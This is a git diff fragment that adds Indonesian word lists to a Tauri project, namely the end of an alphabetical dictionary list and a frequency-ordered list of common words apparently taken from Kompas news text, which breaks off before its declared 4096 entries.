+tunarungu
+tunas
+tunasusila
+tunawicara
+tunawisma
+tunda
+tunduk
+tundungan
+tungau
+tunggak
+tunggakan
+tunggal
+tunggang
+tunggik
+tungging
+tunggit
+tunggu
+tunggul
+tungkai
+tungkak
+tungku
+tunjang
+tunjangan
+tunjuk
+tuntas
+tuntunan
+tuntutan
+tunu
+tupai
+tur
+tura
+turbulensi
+turisme
+turnamen
+turun
+turunan
+turus
+turut
+turutan
+tustel
+tusuk
+tusukan
+tutor
+tutorial
+tutul
+tutup
+tutur
+tuturan
+uang
+uap
+uar
+uarkan
+ubah
+uban
+ubanan
+ubek
+ubi
+ubin
+ubun
+ubur
+ucap
+ucapan
+ucek
+uda
+udang
+udara
+udel
+udeng
+udet
+udik
+udu
+ufuk
+ugahari
+ugalan
+uget
+uir
+ujana
+ujang
+ujar
+ujaran
+uji
+ujian
+ujud
+ujung
+ukhuwah
+ukir
+ukiran
+ukup
+ukur
+ukuran
+ulah
+ulakan
+ulam
+ulama
+ulang
+ulangan
+ular
+ularan
+ulas
+ulasan
+ulat
+ulek
+ulekan
+uleman
+ulet
+uli
+ulin
+ulna
+ultimatum
+ultra
+ultramodern
+ultrasonik
+ultraungu
+ulung
+ulur
+uluran
+umat
+umbai
+umbang
+umbi
+umbilikus
+umbuk
+umbul
+umi
+umpak
+umpama
+umpan
+umpat
+umpatan
+umpet
+umpetan
+umpuk
+umum
+umumnya
+umur
+uncang
+undak
+undang
+undangan
+undi
+unduk
+undur
+unek
+ungap
+unggas
+ungguk
+unggul
+unggulan
+unggun
+unggut
+ungkapan
+ungkat
+ungkit
+uni
+unifikasi
+uniform
+uniformitas
+unik
+union
+unit
+universal
+universalitas
+universum
+unjuk
+unsur
+unta
+untai
+untaian
+untal
+unting
+untuk
+untung
+untungan
+untut
+upacara
+upah
+upahan
+upaya
+upeti
+upil
+ura
+uraian
+urakan
+urap
+urat
+uretra
+uribang
+urine
+uringan
+urinoar
+uris
+uritan
+urna
+uruk
+urun
+urunan
+urung
+urus
+urusan
+urut
+urutan
+usah
+usaha
+usahkan
+usai
+usang
+usap
+usapan
+usia
+usik
+usil
+usiran
+uskup
+ustaz
+usuk
+usul
+usulan
+usungan
+usus
+utama
+utan
+utang
+utara
+utarid
+utas
+uterus
+utilitarian
+utilitas
+utopia
+utopis
+utuh
+utusan
+uvula
+uwak
+uzur
+vagina
+vak
+vakansi
+vakum
+valid
+validasi
+validitas
+valuta
+vandalisme
+variabel
+variabilitas
+varian
+variasi
+varietas
+vas
+vena
+venom
+ventilasi
+venus
+verba
+verbal
+verifikasi
+versi
+vertikal
+vespa
+vestibula
+vet
+veter
+veteran
+via
+vibrasi
+video
+vila
+violet
+virginitas
+virgo
+virtual
+visa
+visi
+visibel
+visioner
+vista
+visual
+visualisasi
+vital
+vitalitas
+vitamin
+vlek
+vokabuler
+vokal
+volume
+volunter
+vonis
+vulgar
+wabah
+wacana
+wadah
+wadak
+wadam
+waduh
+waduk
+wagon
+wah
+wahah
+wahai
+wahana
+wahid
+wahyu
+wajah
+wajan
+wajar
+wajib
+wakaf
+wakil
+waktu
+walang
+walau
+walaupun
+walhasil
+wali
+walimah
+wana
+wanara
+wangi
+wangian
+wangsit
+wanita
+wanti
+warangka
+waras
+warga
+waris
+warisan
+warita
+warkat
+warna
+warni
+warok
+warsa
+warta
+wartawan
+warung
+wasangka
+wasiat
+wasilah
+wasir
+wasit
+waspada
+waswas
+watak
+watan
+watas
+waterpruf
+wawancara
+wawasan
+wayang
+wedana
+weh
+wenang
+wereng
+westernisasi
+wet
+wewenang
+wibawa
+wicara
+widyaiswara
+wig
+wihara
+wijaya
+wijayakusuma
+wijen
+wiku
+wilayah
+wilis
+wira
+wiracerita
+wirakarya
+wiraswasta
+wirawan
+wiri
+wiru
+wisata
+wisatawan
+wisma
+wisuda
+wol
+wolfram
+wong
+wreda
+wujud
+wuku
+wuwungan
+xilan
+xilem
+xister
+ya
+yaitu
+yakin
+yakni
+yang
+yaum
+yoga
+yogi
+yojana
+yunior
+yuridiksi
+yuris
+zabib
+zaim
+zaitun
+zakat
+zalim
+zaman
+zamin
+zamindar
+zan
+zarah
+zat
+zebra
+zenit
+zero
+ziarah
+zikir
+zina
+zirah
+zona
+zoologi
+zuhur
+zuriah
diff --git a/src-tauri/wordlists/id-kompas.lst b/src-tauri/wordlists/id-kompas.lst
new file mode 100644
index 0000000..0c21750
--- /dev/null
+++ b/src-tauri/wordlists/id-kompas.lst
@@ -0,0 +1,4096 @@
+yang
+dan
+ini
+itu
+dengan
+untuk
+dari
+dalam
+akan
+pada
+tidak
+juga
+tersebut
+ada
+bisa
+saat
+tahun
+karena
+sudah
+menjadi
+mereka
+kata
+saya
+lebih
+atau
+kami
+oleh
+sebagai
+adalah
+tak
+satu
+masih
+orang
+seperti
+dia
+namun
+para
+hanya
+mengatakan
+dua
+harus
+kepada
+lalu
+telah
+setelah
+hari
+rumah
+warga
+bahwa
+baru
+banyak
+hal
+melakukan
+hingga
+anda
+menurut
+belum
+dapat
+lain
+beberapa
+kota
+besar
+persen
+sekitar
+tim
+kita
+pemerintah
+pun
+jika
+jalan
+salah
+sementara
+bagi
+dilakukan
+memiliki
+secara
+merupakan
+masyarakat
+atas
+kasus
+terjadi
+selama
+sangat
+kepala
+negara
+saja
+membuat
+korban
+tiga
+lagi
+baik
+kedua
+waktu
+selain
+pemain
+kalau
+tetapi
+anak
+ujar
+daerah
+sampai
+agar
+kali
+sama
+tengah
+kembali
+sejumlah
+ketika
+anggota
+serta
+pertama
+seorang
+sejak
+dunia
+polisi
+sebelumnya
+antara
+sehingga
+juta
+terhadap
+rabu
+sebuah
+harga
+semua
+ketua
+jadi
+pihak
+tetap
+hasil
+partai
+presiden
+memang
+jawa
+katanya
+barat
+kamis
+senin
+tempat
+tapi
+bersama
+mulai
+selasa
+kabupaten
+kemudian
+depan
+timur
+langsung
+terkait
+bulan
+memberikan
+bukan
+lainnya
+melalui
+minggu
+gubernur
+jumat
+tinggi
+selatan
+negeri
+air
+terus
+nasional
+menggunakan
+mengaku
+ingin
+setiap
+berada
+masuk
+pernah
+sendiri
+umum
+pukul
+diri
+luar
+bagian
+kerja
+mobil
+sekolah
+tentang
+kini
+malam
+korupsi
+berbagai
+perusahaan
+bahkan
+uang
+pendidikan
+menteri
+jumlah
+pasar
+apa
+empat
+pusat
+kawasan
+tersangka
+sedang
+hukum
+kondisi
+sebelum
+kantor
+cukup
+mencapai
+miliar
+yakni
+perlu
+pelaku
+masalah
+pertandingan
+wakil
+keluarga
+lokasi
+menit
+mampu
+komisi
+desa
+termasuk
+bola
+calon
+wilayah
+meski
+sempat
+kepolisian
+mengalami
+sabtu
+melihat
+lima
+meminta
+acara
+perempuan
+proses
+gol
+kecamatan
+aksi
+mendapatkan
+badan
+seluruh
+demikian
+tanpa
+dana
+mendapat
+berhasil
+sebesar
+terakhir
+asal
+sebanyak
+datang
+ujarnya
+aku
+jelas
+tahu
+kementerian
+paling
+maka
+pasangan
+masa
+mau
+sekarang
+akibat
+akhirnya
+petugas
+musim
+nomor
+gedung
+menyatakan
+akhir
+rasa
+mungkin
+yaitu
+utama
+sakit
+mantan
+bekerja
+bermain
+nama
+begitu
+utara
+ibu
+lama
+jam
+mengenai
+proyek
+selalu
+motor
+awal
+pembangunan
+punya
+semakin
+naik
+kesehatan
+sesuai
+soal
+polri
+berlangsung
+bahan
+mahasiswa
+inggris
+maupun
+cara
+laga
+segera
+kecil
+dinas
+kegiatan
+nanti
+ekonomi
+tanah
+guru
+pelatih
+diduga
+siswa
+surat
+informasi
+provinsi
+adanya
+posisi
+pesawat
+pekan
+rakyat
+ruang
+bbm
+membawa
+berharap
+penting
+menjelaskan
+menerima
+hidup
+direktur
+menunjukkan
+produk
+dirinya
+pria
+sistem
+khusus
+bawah
+pihaknya
+sedangkan
+kelompok
+eropa
+suara
+berdasarkan
+turun
+terlihat
+bidang
+amerika
+merasa
+ketiga
+melawan
+sebagian
+anggaran
+memberi
+dewan
+membantu
+pagi
+biasa
+milik
+jauh
+kendaraan
+makanan
+poin
+tampil
+api
+jaya
+jangan
+jenis
+digunakan
+memilih
+babak
+usaha
+muda
+kurang
+sering
+apakah
+wartawan
+barang
+enam
+ikut
+politik
+kejadian
+budaya
+polda
+kapal
+minyak
+menuju
+mata
+lanjut
+juara
+dulu
+diketahui
+laporan
+nilai
+ditemukan
+liga
+makan
+klub
+internasional
+tingkat
+universitas
+sebenarnya
+dugaan
+rencana
+biaya
+keputusan
+berbeda
+kenaikan
+piala
+ternyata
+tinggal
+tubuh
+pertemuan
+mana
+jalur
+tangan
+pengadilan
+lembaga
+meningkatkan
+sekali
+mencari
+upaya
+pasal
+padahal
+mengikuti
+industri
+serikat
+mengungkapkan
+pemeriksaan
+kelas
+lapangan
+mudah
+terlalu
+keuangan
+siap
+cepat
+menambahkan
+bagaimana
+kesempatan
+berat
+terutama
+misalnya
+menilai
+keluar
+demokrat
+tewas
+dekat
+perjalanan
+angka
+peserta
+pulau
+menemukan
+mendatang
+hakim
+sepeda
+setempat
+berusia
+penumpang
+terbaik
+pasti
+kemenangan
+sepanjang
+menjalani
+berjalan
+rapat
+bantuan
+justru
+biasanya
+kebutuhan
+jenderal
+digelar
+laut
+sosial
+resmi
+kemarin
+wisata
+keamanan
+mengambil
+jepang
+sulit
+daya
+pula
+sumber
+pemilihan
+hubungan
+komisaris
+triliun
+emas
+final
+meraih
+siang
+bentuk
+lingkungan
+kaki
+keras
+sedikit
+hampir
+kemungkinan
+saksi
+hak
+operasi
+sepak
+mendukung
+panjang
+kebijakan
+apalagi
+grup
+bila
+menghadapi
+enggak
+keduanya
+manusia
+kan
+keterangan
+menarik
+serangan
+saham
+diberikan
+agung
+publik
+pejabat
+merah
+tni
+tentu
+sebab
+bisnis
+ungkap
+listrik
+dukungan
+arah
+lewat
+bukti
+belakang
+meskipun
+italia
+buku
+pengguna
+olahraga
+menurutnya
+hadir
+perdagangan
+gunung
+teknologi
+warna
+terdapat
+buruh
+raya
+lahan
+sekaligus
+spanyol
+alat
+membangun
+bupati
+massa
+menunggu
+bagus
+usia
+bakal
+disampaikan
+tenaga
+kuat
+tadi
+peluang
+aparat
+pidana
+penelitian
+polres
+menyebutkan
+peristiwa
+terlibat
+bakar
+sini
+berasal
+sisi
+kampung
+siapa
+langkah
+pimpinan
+alasan
+gelar
+sidang
+terbuka
+adapun
+dianggap
+tepat
+membuka
+menolak
+bertemu
+bus
+dibandingkan
+membeli
+kompas
+tampak
+asing
+berusaha
+kartu
+pemberantasan
+sang
+memenuhi
+bayi
+diperkirakan
+pebalap
+tindak
+pernyataan
+perubahan
+lintas
+kebakaran
+tujuh
+jerman
+diharapkan
+menang
+putih
+situs
+produksi
+tutur
+dinilai
+kamar
+berupa
+disebut
+dokter
+tanggal
+pilkada
+penyidik
+pantai
+menggelar
+menyebabkan
+penyakit
+menjaga
+kecelakaan
+muncul
+sektor
+bangunan
+gagal
+bernama
+mengetahui
+antaranya
+buah
+karya
+sana
+dini
+gawang
+boleh
+meningkat
+seharusnya
+belajar
+luka
+ikan
+bandara
+banjir
+senjata
+musik
+chelsea
+sungai
+diberitakan
+selanjutnya
+dibawa
+kalah
+juni
+kekerasan
+permainan
+barcelona
+taman
+alam
+pemilik
+bicara
+atlet
+penuh
+latihan
+kulit
+pengembangan
+bahasa
+papua
+mencetak
+lampung
+lagu
+perancis
+kiri
+dasar
+pemimpin
+stadion
+wanita
+kelurahan
+oktober
+ditangkap
+kalimantan
+indeks
+bogor
+pekerjaan
+hujan
+ratusan
+meninggal
+menegaskan
+sore
+dikenal
+terdakwa
+kereta
+berita
+perwakilan
+pekerja
+pilihan
+penjualan
+pengunjung
+selesai
+september
+puluhan
+gas
+kanan
+tidur
+pasalnya
+delapan
+memastikan
+permintaan
+penjara
+benar
+bangsa
+solo
+pertumbuhan
+juli
+lokal
+iii
+foto
+januari
+tujuan
+mencoba
+sumatera
+menyampaikan
+yakin
+hukuman
+tegas
+desember
+seusai
+peningkatan
+tindakan
+positif
+aktivitas
+energi
+singapura
+kemampuan
+pintu
+malang
+tugas
+olimpiade
+pak
+level
+izin
+pajak
+mengakui
+pengusaha
+pariwisata
+usai
+sambil
+kontrak
+rusia
+bebas
+kualitas
+sehat
+pemilu
+batu
+perangkat
+melaporkan
+layanan
+udara
+sukses
+april
+istri
+memutuskan
+mei
+korea
+seni
+ditemui
+pemuda
+november
+darah
+kebudayaan
+target
+uji
+menjelang
+timnas
+khususnya
+golkar
+pedagang
+penggunaan
+menambah
+petani
+peringkat
+penerbangan
+medan
+sekretaris
+joko
+agus
+yudhoyono
+nazaruddin
+kpu
+meninggalkan
+titik
+aplikasi
+kalangan
+kampanye
+berarti
+jawab
+senilai
+manchester
+dimulai
+hutan
+agustus
+london
+maret
+peraturan
+narkoba
+bumi
+rendah
+alias
+aturan
+tua
+islam
+wisatawan
+demi
+diterima
+suatu
+belanda
+dibuat
+kilometer
+fasilitas
+jaringan
+mengeluarkan
+bertahan
+tiba
+pulang
+tenggara
+andi
+jaksa
+investasi
+fraksi
+agama
+kerap
+stasiun
+suap
+terdiri
+membutuhkan
+pelaksanaan
+wali
+putri
+pegawai
+penduduk
+melanjutkan
+obat
+ajang
+perhatian
+humas
+budi
+and
+kehilangan
+diperiksa
+buruk
+hitam
+jatuh
+fauzi
+terbesar
+john
+terbukti
+apple
+tertentu
+militer
+dihubungi
+pelayanan
+unggul
+mengurangi
+tambahan
+menikmati
+catatan
+susilo
+tambah
+melibatkan
+puncak
+bintang
+potensi
+diikuti
+festival
+bergerak
+gaya
+penghargaan
+daging
+tahanan
+mesin
+pelabuhan
+lolos
+sejarah
+lakukan
+survei
+ancaman
+senang
+global
+perdana
+mengembangkan
+pribadi
+saling
+kehidupan
+juru
+bunga
+pengalaman
+keempat
+kompleks
+luas
+bersih
+putra
+lantaran
+menyebut
+peran
+jiwa
+tiket
+dahlan
+hati
+new
+konflik
+berakhir
+memasuki
+ruangan
+tambahnya
+suriah
+tembakan
+kunjungan
+buat
+itulah
+malah
+rencananya
+pasien
+turnamen
+area
+jenazah
+tokoh
+persoalan
+kompetisi
+satunya
+pesan
+game
+sikap
+pasukan
+sejauh
+perawatan
+aman
+perkara
+duduk
+menciptakan
+fokus
+mati
+ditetapkan
+toko
+diberi
+peneliti
+turut
+cedera
+putaran
+orangtua
+jasa
+timnya
+situasi
+maksimal
+mendorong
+putusan
+pertahanan
+semuanya
+ulang
+majelis
+diminta
+perumahan
+kesulitan
+menyelesaikan
+lanjutnya
+kabar
+komunikasi
+karyawan
+coba
+bencana
+lantai
+nantinya
+arus
+februari
+percaya
+perkembangan
+sma
+penyelidikan
+lawan
+bursa
+pohon
+truk
+kepentingan
+harapan
+tol
+balik
+organisasi
+sesuatu
+panas
+gangguan
+televisi
+tuturnya
+mengalahkan
+mempunyai
+panitia
+menimbulkan
+ahli
+polsek
+telepon
+studi
+dilaporkan
+tahap
+dibangun
+kredit
+persidangan
+indah
+tuan
+periode
+rumahnya
+pabrik
+tradisional
+bergabung
+menyediakan
+sebaiknya
+memanfaatkan
+berisi
+risiko
+menetapkan
+berkembang
+terlebih
+premier
+bom
+teman
+pelanggaran
+kopi
+suka
+tangga
+minta
+makin
+pemberian
+khas
+awalnya
+kejaksaan
+terpaksa
+pameran
+ujian
+penurunan
+gerakan
+sembilan
+suasana
+menyiapkan
+tercatat
+anaknya
+berencana
+jarak
+skor
+serius
+mengajukan
+seseorang
+investor
+riset
+ditutup
+murah
+membayar
+faktor
+ribuan
+melanggar
+penyebab
+penampilan
+maju
+rusak
+ribu
+menengah
+pelajar
+guna
+gigi
+diambil
+memakai
+menjual
+berubah
+layak
+gelandang
+kekuatan
+daftar
+tamu
+penalti
+dilaksanakan
+halaman
+hendak
+pendapatan
+konsumen
+satuan
+ataupun
+wajah
+pembunuhan
+pemerintahan
+menyerahkan
+gempa
+kayu
+tekanan
+dibuka
+jembatan
+sanksi
+bersubsidi
+terima
+transportasi
+online
+peringatan
+menjalankan
+dijual
+aktif
+busana
+pengadaan
+dijadikan
+penyidikan
+keadaan
+ilmu
+fisik
+supaya
+menuntut
+pergi
+inilah
+unjuk
+menangkap
+seri
+memeriksa
+koordinator
+dipakai
+ucap
+kerugian
+nyaman
+berhenti
+tanjung
+ponsel
+lihat
+lebaran
+mengingat
+minum
+transaksi
+menentukan
+kasih
+serupa
+ganda
+gabungan
+cenderung
+pertanian
+dikatakan
+pos
+segala
+perlindungan
+tes
+ditahan
+pendukung
+perguruan
+kesepakatan
+modal
+parlemen
+tumbuh
+umpan
+ayat
+angkutan
+penyerang
+butuh
+paket
+sapi
+mengatasi
+mengenakan
+ungkapnya
+kinerja
+manajemen
+setidaknya
+maluku
+mandiri
+minuman
+terkena
+dampak
+komunitas
+petenis
+memimpin
+manajer
+semangat
+suku
+terang
+menutup
+jelasnya
+hilang
+perjuangan
+angin
+kiper
+umumnya
+terbaru
+berlaku
+isu
+gula
+kematian
+apabila
+ajun
+tata
+cerita
+nusa
+menghasilkan
+personel
+pengurus
+namanya
+nelayan
+keberadaan
+subsidi
+menangani
+layar
+gratis
+mencegah
+sopir
+akses
+kuasa
+menurunkan
+lengkap
+menuturkan
+perang
+daripada
+cabang
+kepulauan
+infrastruktur
+suami
+mengubah
+hijau
+besok
+penonton
+staf
+perekonomian
+masjid
+haji
+kursi
+mengamankan
+konsumsi
+tersedia
+swasta
+ringan
+singkat
+menyusul
+dibutuhkan
+mendatangi
+jantung
+mengapa
+khawatir
+habis
+hasilnya
+krisis
+impor
+konsep
+sehari
+desain
+tanda
+penanganan
+melepaskan
+cinta
+memperoleh
+disebabkan
+bek
+menawarkan
+berangkat
+tuntutan
+perbaikan
+remaja
+cuma
+jabatan
+belanja
+jadwal
+unggulan
+ukuran
+kotak
+ditanya
+sebagaimana
+menyerang
+politisi
+tanaman
+koleksi
+pemilih
+kreatif
+selamat
+sipil
+mempertahankan
+padang
+persiapan
+berdiri
+pengawasan
+hektar
+menjabat
+nusantara
+diperlukan
+berwarna
+dibanding
+diungkapkan
+wajib
+solusi
+penangkapan
+mengunjungi
+akibatnya
+lomba
+tertinggi
+terasa
+sampah
+standar
+pembelian
+pakai
+spbu
+kanker
+pola
+ekspor
+kelapa
+berpikir
+mendengar
+konser
+beras
+ketat
+melewati
+gaji
+menahan
+terletak
+generasi
+sekadar
+artinya
+rambut
+menyambut
+rekan
+terpilih
+rekor
+ayam
+kemacetan
+fungsi
+dilihat
+utang
+ayah
+berbicara
+medali
+beragam
+kamera
+karakter
+membantah
+pakaian
+teknik
+pemenang
+mengakibatkan
+klasemen
+selaku
+versi
+mengumumkan
+dikutip
+tunggal
+pelatihan
+mengandung
+prestasi
+adat
+jumpa
+membentuk
+efek
+pertanyaan
+tendangan
+dilansir
+berapa
+pengamanan
+republik
+istana
+ramadhan
+mahkamah
+kedatangan
+keinginan
+komputer
+berani
+menampilkan
+mendesak
+mengganggu
+mengajak
+kelima
+menguasai
+kampus
+dahulu
+detik
+sederhana
+kapasitas
+pelanggan
+kebanyakan
+samping
+kategori
+menjawab
+mengatur
+sengaja
+ilustrasi
+takut
+gambar
+rombongan
+keuntungan
+berikutnya
+mahal
+lahir
+tentara
+terbang
+belakangan
+melainkan
+otak
+jatim
+jangka
+penetapan
+profesional
+menghentikan
+miskin
+angkatan
+demokrasi
+memperbaiki
+matahari
+bilang
+operasional
+memulai
+mencatat
+aliran
+rangka
+panggung
+bertugas
+keluarganya
+tradisi
+menghindari
+lanjutan
+properti
+komite
+kesalahan
+insiden
+membahas
+kaum
+isi
+baju
+balapan
+negatif
+bekas
+kriminal
+brasil
+melaksanakan
+dinyatakan
+kerusakan
+sosok
+wisma
+berupaya
+tiap
+diserahkan
+menderita
+dimiliki
+papar
+pemprov
+dewasa
+batas
+peluncuran
+sebaliknya
+dipastikan
+sarana
+pendapat
+kunci
+parah
+menanggapi
+dikeluarkan
+komitmen
+walaupun
+menguat
+pembuatan
+beli
+konferensi
+sayang
+pangan
+susu
+perbankan
+artis
+beroperasi
+pondok
+perbatasan
+parkir
+lampu
+narkotika
+bertambah
+tajam
+istrinya
+penembakan
+disebutkan
+cek
+kekalahan
+pelajaran
+berkunjung
+kepercayaan
+asosiasi
+markas
+seleksi
+smp
+balai
+mengingatkan
+zona
+nah
+menyaksikan
+seiring
+harian
+diamankan
+dirawat
+asli
+berbasis
+kejahatan
+kelahiran
+pendek
+rute
+burung
+setengah
+umat
+dikabarkan
+memperkuat
+diperoleh
+dokumen
+setahun
+restoran
+menjadikan
+berkaitan
+temuan
+ditambah
+menaikkan
+enggan
+migas
+contoh
+terbakar
+kekurangan
+dilengkapi
+urutan
+unik
+pindah
+tentunya
+menghadiri
+sebut
+filipina
+hewan
+diskusi
+fakultas
+kader
+upah
+cuaca
+strategi
+kehadiran
+hamil
+lepas
+kenapa
+efektif
+dijadwalkan
+raja
+sasaran
+jajaran
+tarif
+dialami
+ledakan
+menekan
+motif
+teroris
+parpol
+direktorat
+perilaku
+penyanyi
+pengetahuan
+medis
+hadiah
+akrab
+terbatas
+ketimbang
+menikah
+pernikahan
+merasakan
+yayasan
+jarang
+perbedaan
+melayani
+pengelolaan
+kapan
+pengawas
+permasalahan
+diselenggarakan
+pembukaan
+dipimpin
+kualifikasi
+benda
+melemah
+terpisah
+pesta
+jaminan
+rangkaian
+upacara
+syarat
+mengangkat
+perempat
+danau
+fakta
+tantangan
+terkenal
+yunani
+kecepatan
+mengancam
+oknum
+tipe
+sayangnya
+puasa
+kaca
+garis
+terjadinya
+independen
+seluas
+tergantung
+wasit
+maaf
+misi
+mengisi
+roda
+didampingi
+rektor
+menurun
+menganggap
+aset
+purnama
+biru
+sabu
+mundur
+suaminya
+berbahaya
+tulang
+didik
+bulu
+menghadirkan
+pencurian
+rutin
+beban
+pasokan
+perkebunan
+unsur
+kain
+didukung
+merusak
+bersangkutan
+memungkinkan
+keadilan
+kandidat
+bertanggung
+hebat
+tawuran
+materi
+pencarian
+reserse
+berikut
+identitas
+memicu
+nuh
+mengejar
+seks
+memenangkan
+gereja
+mandi
+urusan
+konstitusi
+lantas
+sepatu
+praktik
+menggantikan
+pikir
+bersaing
+membela
+peralatan
+tipis
+pembahasan
+penyelenggara
+eksekutif
+produsen
+mengumpulkan
+pelaksana
+koalisi
+kalinya
+nasi
+melintas
+jual
+sawit
+kapten
+ditangani
+koordinasi
+resor
+tulis
+terancam
+mudik
+dihadiri
+nggak
+banyaknya
+alternatif
+tertarik
+kesenian
+damai
+berkas
+tertinggal
+pembayaran
+persatuan
+mengantisipasi
+palsu
+ban
+membuktikan
+memahami
+undangan
+buatan
+warung
+skuad
+sebelah
+kewenangan
+memenangi
+mengenal
+situ
+perayaan
+penyelenggaraan
+pembeli
+sel
+divisi
+sepuluh
+akun
+perairan
+berperan
+pengobatan
+pengembang
+kabur
+afrika
+siaran
+jabar
+cocok
+menempati
+sisa
+domestik
+natal
+kaya
+berjanji
+tanggung
+menghabiskan
+keunggulan
+berpotensi
+ruas
+peduli
+kendati
+menerapkan
+kandungan
+tari
+palestina
+dingin
+mengirimkan
+signifikan
+panggilan
+melaju
+nasabah
+pemadam
+menemui
+bersalah
+band
+pas
+menewaskan
+protes
+perhubungan
+semacam
+asuransi
+bpk
+seksual
+diadakan
+sepenuhnya
+melindungi
+teknis
+tertutup
+lupa
+meja
+kesejahteraan
+dipilih
+rokok
+lemak
+perut
+banten
+mirip
+tema
+beredar
+penulis
+wawancara
+verifikasi
+tas
+ucapnya
+merebut
+mengonsumsi
+relatif
+mulut
+bandar
+agak
+besi
+tergabung
+iklan
+dinding
+promosi
+mengadakan
+harganya
+kejuaraan
+pengendara
+berkat
+perikanan
+merek
+perahu
+kuning
+puas
+gelombang
+beruntung
+kecewa
+sekitarnya
+mengirim
+membaca
+kurikulum
+kering
+imbang
+lancar
+bertujuan
+kebiasaan
+pantauan
+ketentuan
+kubu
+pertimbangan
+aktivis
+papan
+berdampak
+dimintai
+pengacara
+elektronik
+dimanfaatkan
+apbn
+gugatan
+mentah
+tahunan
+citra
+berkurang
+duta
+tetangga
+beliau
+pon
+indra
+kerjasama
+beasiswa
+dilanjutkan
+penggemar
+menginginkan
+hiburan
+dalamnya
+blok
+pengelola
+tampaknya
+berukuran
+menulis
+segar
+kedelai
+suporter
+lumpur
+melahirkan
+menyenangkan
+permohonan
+penambahan
+memainkan
+pertengahan
+mempersiapkan
+maskapai
+sosialisasi
+padat
+berhak
+sepakat
+diajukan
+tenang
+liar
+dikembangkan
+usulan
+afganistan
+biro
+manis
+jurusan
+kosong
+sadar
+semula
+pembicaraan
+nyaris
+mabes
+sesi
+perbuatan
+semoga
+gelap
+pasir
+kuliah
+aneka
+penjelasan
+kompetensi
+main
+berinisial
+tegasnya
+berbagi
+permukaan
+silam
+wajar
+mengklaim
+tuduhan
+karier
+cantik
+pilih
+seksi
+kian
+penyelesaian
+sudut
+bambu
+terungkap
+kekayaan
+kongres
+rancangan
+beserta
+muka
+keseluruhan
+mesir
+sedikitnya
+buka
+membuatnya
+sempurna
+tandasnya
+membenarkan
+melarikan
+alami
+tambang
+stres
+ambil
+merugikan
+kuota
+berlatih
+darat
+solar
+penganiayaan
+rawan
+jumlahnya
+kebun
+bersamaan
+fitur
+mengakhiri
+sejahtera
+menyadari
+deputi
+jawaban
+kencang
+diatur
+pendaftaran
+wita
+dusun
+tunai
+dakwaan
+persegi
+mengundang
+baku
+terluka
+menonton
+bukanlah
+mitra
+saluran
+ketinggian
+berjuang
+apapun
+pengganti
+lelaki
+rekomendasi
+berhubungan
+mengungkap
+ramai
+menabrak
+merdeka
+rekannya
+mayat
+cadangan
+administrasi
+dikirim
+mewakili
+pemkab
+bentrokan
+eko
+mekanisme
+jateng
+menyelamatkan
+manfaat
+kandang
+apartemen
+strategis
+diakui
+faisal
+menduga
+pergerakan
+ganti
+merayakan
+meluncurkan
+ekor
+lebar
+berpendapat
+kecuali
+darurat
+berjumlah
+turki
+raksasa
+tren
+kisah
+menjamin
+diturunkan
+ide
+prosedur
+pertunjukan
+memasang
+desainer
+rutan
+untung
+pengakuan
+teh
+bertindak
+pungkas
+dipenuhi
+diterapkan
+seniman
+agen
+memperkirakan
+tersebar
+bukit
+setara
+penerimaan
+nasib
+lini
+direncanakan
+bung
+penanggulangan
+perampokan
+menandatangani
+pinjaman
+lari
+berawal
+sisanya
+ilegal
+paripurna
+obyek
+terganggu
+dikenakan
+mengembalikan
+ujung
+kuartal
+pemungutan
+pakar
+memerlukan
+makanya
+menimpa
+penderita
+kalteng
+menyimpan
+posko
+rasanya
+ditentukan
+memproduksi
+umur
+bapak
+jati
+berjudul
+inflasi
+perdamaian
+berkualitas
+pembinaan
+disiapkan
+berfungsi
+meliputi
+memasukkan
+keselamatan
+denda
+janji
+memanggil
+sih
+performa
+pengemudi
+permukiman
+mempertimbangkan
+bersifat
+mal
+libur
+gajah
+dapur
+dibeli
+walau
+didapat
+vietnam
+bersenjata
+bersedia
+berunjuk
+mayoritas
+favorit
+kadang
+telur
+mengimbau
+dewi
+pandangan
+lapas
+ibadah
+rekening
+tawaran
+kertas
+mewah
+rsud
+bos
+kepemilikan
+berlebihan
+komnas
+pokok
+responden
+turis
+temannya
+nuklir
+institusi
+tahan
+pertarungan
+andalan
+kuningan
+garut
+populer
+pembiayaan
+keberhasilan
+bahagia
+asasi
+tubuhnya
+dipanggil
+menempatkan
+penolakan
+panen
+sebulan
+perjanjian
+perasaan
+lulus
+berkumpul
+penerangan
+polandia
+depannya
+plastik
+diselesaikan
+kepemimpinan
+hadapan
+pencegahan
+penutupan
+kuliner
+seminggu
+nyata
+sengketa
+investigasi
+membersihkan
+alasannya
+kehormatan
+sawah
+menyarankan
+ukraina
+macet
+tertangkap
+keenam
+saudara
+mental
+melarang
+berlanjut
+menjuarai
+penuntut
+menargetkan
+pintar
+majalah
+zaman
+istimewa
+tutup
+minat
+seputar
+wayang
+memperlihatkan
+dilarang
+longsor
+pengaruh
+garam
+keterlibatan
+metode
+memaksa
+pengamat
+pertambangan
+pemegang
+pemudik
+ditawarkan
+revisi
+rekaman
+mengandalkan
+tersendiri
+lambat
+mendekati
+jejaring
+disertai
+disediakan
+penerima
+profesi
+federasi
+daun
+kok
+akbar
+ibunya
+kendala
+komponen
+penilaian
+banget
+persaingan
+kekuasaan
+perintah
+sibuk
+bangga
+penegak
+atap
+mengelola
+jelang
+jemaah
+padi
+kesan
+tukang
+kehamilan
+bendera
+diluncurkan
+deras
+tersisa
+memantau
+mencuri
+tingginya
+kala
+melakukannya
+pinggir
+pengunjuk
+mewujudkan
+alih
+inti
+kudus
+sah
+teror
+karang
+disambut
+ilmuwan
+gizi
+sirkuit
+roma
+harinya
+pengiriman
+jalanan
+mengajar
+menembus
+mari
+kabinet
+puskesmas
+pengungsi
+tulisan
+menyita
+dimana
+memegang
+karet
+pelantikan
+iskan
+larangan
+bertanding
+pemberitaan
+dimaksud
+mendampingi
+terkesan
+mogok
+departemen
+bermotor
+alokasi
+absen
+asisten
+asap
+liburan
+mengarah
+institut
+penemuan
+pahlawan
+optimistis
+antrean
+berpengaruh
+perlawanan
+bermasalah
+kondisinya
+asi
+gerbang
+tipikor
+penahanan
+kepastian
+mengurus
+balaikota
+matang
+kemajuan
+peluru
+perak
+pemkot
+pembuat
+badai
+dirilis
+tangkis
+surya
+pentingnya
+ramah
+setuju
+swedia
+brigadir
+pensiun
+dosen
+campuran
+melengkapi
+sentimen
+tanya
+penjaga
+berhadapan
+imam
+pengumuman
+heran
+kode
+almarhum
+arif
+prosesor
+gunakan
+kedudukan
+semalam
+ilmiah
+mengemukakan
+indikasi
+membakar
+kajian
+barisan
+tepatnya
+kebetulan
+belasan
